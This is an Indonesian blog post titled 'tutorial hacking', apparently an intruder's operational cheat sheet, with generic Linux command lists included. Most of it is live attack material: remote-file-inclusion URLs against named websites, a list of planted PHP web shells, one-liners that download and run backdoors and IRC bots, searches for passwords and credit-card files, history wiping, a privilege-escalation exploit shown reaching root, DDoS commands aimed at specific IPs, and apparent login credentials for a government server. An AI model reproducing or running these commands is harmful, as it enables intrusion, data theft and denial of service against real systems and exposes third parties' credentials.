tutorial hacking
=============================--==[[ Petuah jin-nakal]]==--
=============================
Hacking adalah kesungguhan untuk belajar, Hacking adalah "diam" tapi
otaknya bekerja, Hacking adalah sebuah proses kebebasan. Seorang hacker
adalah seseorang yang ingin mengerti sebuah sistem, mengetahui bagaimana
sang sistem bereaksi, bersenang-senang mengambil alih kekuasaan di
server tersebut dan tertarik dalam menemukan bugs/kelemahan2 sistim itu sendiri.
===========
ALAT PERANG
===========
http://web2ftp.com <-untuk ftp
http://e107.org/edownload.php <--souce php cms
======
injeck
======
http://webkis.freecoolsite.com/injeck.txt?&cmd <==tembak
http://webkis.freecoolsite.com/anjunbot.txt?&cmd <==bot
http://www.geocities.com/onald_doank/hack.txt?&cmd <==tembak pake tools yg lebih lengkap
http://onadoa.freefronthost.com/hacking.txt?&cmd <===tools rozi
=========================================
KALO DAH MASUK....TEMBAK PAKE COMMAND INI
=========================================
directory ==> find / -type d -perm 777
directory ==> find / -user nobody -group nobody -type d
directory ==> find / -user apache -group apache -type d
directory ==> find / -perm 0777 -type d
liat server ==> uname%20-a;id
liat inert/ip ==> /sbin/ifconfig
tar -czvf file.tar.gz [dir] <===mau ngetar
find | grep password
find | grep passwd
find | grep agora <==== nyari cc
cat /etc/passwd
wget argento-bali.com/xpl/bin.txt;perl bin.txt <==jalan kan scanning
/home/monalisa <-- aku pilih ini ...
dan masuk ke folder public_html ...
fetch
GET -v <===sunOs
==============================
ROOT port 8888/pass 0168565966
==============================
lwp-download http://www.grothwoodshop.com/includes/door.tgz;tar -zxvf door.tgz;cd .door;chmod 755 divre;chmod 755 kik;./kik /usr/sbin/httpd ./divre <==port 12345/lovedivre5
lwp-download http://www.nnprock.com/php/news/anjun/door.tgz;tar -zxvf door.tgz;cd .door;chmod 755 divre;chmod 755 kik;./kik /usr/sbin/httpd ./divre <==port 12345/lovedivre5
lwp-download http://www.geocities.com/pinscasher/root.gz;tar -zvxf root.gz;cd root;./loginx 1970 1970
lwp-download http://www.geocities.com/riau_hacker/root.gz;tar -zvxf root.gz;cd root;./loginx 1970 1970
gunzip http://www.geocities.com/pinscasher/root.gz;root.gz;cd root;./loginx 1970 1970 <====root mantaff
badung.go.id 8888 <--telnet
badung.go.id 22 anjun/mautauaja <==user
===================
Command Dasar Linux
===================
Untuk mengerti dan memahami linux ada baiknya hal awal yang mesti dipahami dan dimengerti adalah command shell di dalam linux sebab hampir semua pekerjaan didalam linux di eksekusi melalui command shell
dibawah ini adalah command shell yang wajib untuk diketahui dan pada umumnya digunakan :
ls : seperti command dir di cmdnya windows, buat menampilkan list directory dan file opsi-opsinya :
-R Menampilkan list sampai ke subdirectory dari direktori kita sekarang
-l list secara long mode, menampilkan permission serta nama user pemilik file or directory
-a list file-file hidden n non hidden
pwd : mengetahui directory sekarang tempat kita berada
whereis : mencari lokasi file sama halnya dengan menggunakan perintah locate
cp : untuk mengcopy file dan bila untuk mengcopy directory menggunakan opsi -r
mv : untuk merename atau memindahkan file atau directory
rm : menghapus file or directory,biasanya dengan opsi -rf (recursif n force)
cd : untuk change directory
more : untuk melihat perhalaman
who / w / finger : untuk mengetahui user yang sedang aktif
passwd : untuk ganti password user anda
su : untuk menjadi user root atau user lain
wc : menghitung banyak byte,baris,huruf,kalimat
kill : untuk menghentikan sebuah proses
ps : untuk melihat proses yang sedang berjalan
chmod : untuk mengubah permission suatu file atau directory
chown : untuk mengubah kepemilikan suatu file atau directory
chgrp : untuk mengubah group suatu file atau user
at / cron : untuk schedulling
tar : untuk mengekstrak file ter compres
rpm : untuk menginstall file rpm
chkconfig : melihat,menambah,menghapus program yang berjalan pada waktu start up
lsmod : melihat modul-modul yang ada
rmmod : menghapus modul-modul yang ada
ldconfig : meload configurasi
sudo : melakukan perintah dengan priveleges root
mungkin itu beberapa perintah dasar linux yang dapat kami tuliskan disini, tinggal kreatifitas dan kemauan untuk melakukan explorasi, experimen dan riset yang mendalam terhadap linux, dan untuk mengetahui lebih banyak tentang perintah di command shell itu tinggal menggunakan " --h " atau " -? " contoh : " tar --h " (perintah itu dijalankan tanpa tanda kutip)
===========================================================
id --> user con il quale si � entrati
uname -a --> versione del sistema
ls --> lista file nella cartella dove si �
ls -la --> lista file + specifiche e permessi
cd [nomecartella] --> per entrare in una cartella
cd [cartella]/[cartella] --> per entrere in una sottocartella
mkdir [nomecartella] --> crea una cartella
df -h --> vedere le specifiche degli hardisk e partizioni
wget [url]/[file] --> scaricare un file
GET [url]/[file]>[file] --> scaricare un file
curl [url]/[file] -o [file] --> scaricare un file
fetch [url]/[file] --> scaricare un file
tar -xzvf [file] --> decomprimere un file .tar.gz o .tgz
find / -perm 777 --> trovare una cartella dove si hanno i permessi di scrittura
chmod 777 [file] --> da i permessi a un file in una cartella dove si hanno i permessi
./[file] --> avvia il file
mv [file] [nuovonome] --> rinomina file
mv [cartella] [nuovo nome] --> rinomina la cartella
mv [file] [cartella] --> sposta il file nella cartella
pwd --> mostra la cartella in qui si � ora
ps x --> mostra i processi attivi
rm [nomefile] --> rimuove un file
rm [nomefile] [nomefile] --> rimuove + file
rm -rf [cartella] --> rimuove la cartella con i file dentro
rmdir [cartella] --> rimuove una cartella vuota
cat [nomefile.txt] --> mostra il file.txt
echo [testo]>[file.txt] --> cancella il file.txt e ci scrive testo
echo [testo]>>[file.txt] --> aggiunge testo nell'ultima riga di file.txt
gcc -o [file] [file.c] --> compila il file.c in file
perl [file.pl] --> avvia un file in perl
uptime --> visualizza il tempo di up della macchina
whereis [file] --> visualizza dove si trova un file di sistema tipo wget
==========
TCL.EGGROP
==========
wget http://www.osoktrading.com/oneadmin/_files/anjun/loader.tar.gz;tar -zvxf loader.tar.gz;cd loader;./nadya conf bot-01 ane 209.216.253.244 riauhacker jin_nakal;./run conf /usr/local/apache ;cd scripts;./autobotchk conf /var/tmp/loader -noemail -5 <===-untuk flood
http://www.osoktrading.com/oneadmin/_files/anjun/loader.tar.gz;tar -zvxf loader.tar.gz;cd loader;./nadya conf bot-01 ane 209.216.253.244 riauhacker jin_nakal;./run conf /usr/local/apache ;cd scripts;./autobotchk conf /var/tmp/loader -noemail -5 <====auto join ke kiss
wget http://www.nnprock.com/php/news/anjun/jin.tar.gz;tar -zvxf jin.tar.gz;cd jin;./nadya conf hitam putih 87.248.180.98 riauhacker jin_nakal;./eggdrop -m conf <===multi tcl
wget http://geocities.com/riau_hacker/kissgames.tar.gz;cd kissgames;./b conf Kiss-games Kiss 87.106.87.159 kiss jin_nakal;./eggdrop -m conf <===3 in 1 game
wget http://www.nnprock.com/psyanjun.tar.gz;tar -zvxf psyanjun.tar.gz;cd anjun;./config admin 2005;./fuck;./run
==============
tools.phpshell
==============
wget http://www.geocities.com/onald_doank/THIEFPHP.txt;mv THIEFPHP.txt shell.php
wget http://www.geocities.com/riau_hacker/phpshell.txt;mv phpshell.txt php.php <==shell.php
wget http://www.geocities.com/onald_doank/hack.txt;mv hack.txt hack.php <==tools.phpshell
========
CADANGAN
========
http://wp1016957.wp030.webpack.hosteurope.de/_cms/index2.php?includes_dir=http://www.geocities.com/onald_doank/hack.txt?&cmd
http://www.ircscripters.net/bugtracker/class.mysql.php?path_to_bt_dir=http://www.artofcar.ch/event/hole.txt?&cmd
http://www.thescein.com/index.php?mode=http://www.grothwoodshop.com/includes/hole.txt?&cmd
http://tijuana.ch/main.php?page=http://www.grothwoodshop.com/includes/hole.txt?&cmd
=========
php shell
=========
http://silentdon.com/php.php
http://www.grothwoodshop.com/php.php
http://202.46.69.186/yudi.php
http://www.thescein.com/anjun/php.php
http://jin.freefronthost.com/tcl/phpshell.php
http://www.webz24.de/event/anjun/php.php
http://www.design-kamin.de/CultSiteDWv2/NAVIGATION/artmedic_event/php.php
http://www.superslickstuff.com/php.php
http://www.videbech.dk/php.php
http://duckwoman.igloe.net/anjun/php.php
http://www.totalcombatzone.com/modules/vwar/admin/anjun/php.php
http://koranto.com/php.php
http://onadoa.freefronthost.com/THIEFPHP.php
http://www.artofcar.ch/event/tool.php
http://www.grothwoodshop.com/includes/php.php
http://php.rtaclan.de/modules/PNphpBB2/includes/tool.php
http://www.nnprock.com/php/news/anjun/tool.php
http://members.lycos.co.uk/retak/cardink/3.txt
http://anjun.awardspace.com/php.php
http://webkis.freecoolsite.com/php.php
http://www.undercover-freak.net/php.php
http://www.osoktrading.com/oneadmin/_files/anjun/shell.php
======
PSYBNC
======
http://www.one.net.ua/content.php?file=http://www.grothwoodshop.com/includes/hole.txt?&cmd
http://202.46.69.186/yudi/auction/auction/auction_common.php?phpbb_root_path=http://www.grothwoodshop.com/includes/hole.txt?&cmd
/server sunvalleyoptics.com 2006 anjun2006 IDENT anjun
/server host-148-244-244-242.block.alestra.net.mx 2006 anjun2006 ident anjun
/server www.ircscripters.net 36874 mautauaja ident pemilik
/server 211.100.61.163 6668 mautauaja ident pemilik
/server kalau.gue.dingin.kenapa.loe.yang.panas.uk.to 6666 dewata ident anjun
=============================
: MARI KITA MAINKAN ROOTNYA :
=============================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0
cd /tmp ; mkdir ... ; cd ....
wget www.norifumiya.org/local.tar.gz
tar -zxvf local.tar.gz
cd local
./lconfex -p
./lconfex -f
./handy.sh 0xbffff625 0xbffff5f1
GOT IT! Your magic number is : 864
Now create a dir 'segfault.eng' and touch a file named 'segfault.eng'
in it.
Then exec "./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 864" to get
rootshell
*hint* : try play with -b if not succeed. [ n = 0..4 ]
ie : ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 864 -b 1
Good Luck d0inks!
mkdir segfault.eng; touch segfault.eng/segfault.eng
./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
id
uid=0(root) gid=48(apache) groups=48(apache)
===================================
[JANGAN DI PAKE SEMBARANGAN..!!!!!]
===================================
lwp-download http://geocities.com/issueznet/tools/ddos.pl;perl -c ddos.pl;chmod 755 ddos.pl;perl ddos.pl 222.124.5.243 80 1000000000000000000000000000000000000000000000000000000000000000000000000000000
wget http://onadoa.freefronthost.com/Ddos-tools/targa.c;chmod 777 targa.c;./targa.c 202.159.6.164 53 10
/server sh81.surpasshosting.com 6666 mautauaja port 6666
/server sunvalleyoptics.com 2006 mautauaja port 2006 anjun
Tidak ada komentar:
Posting Komentar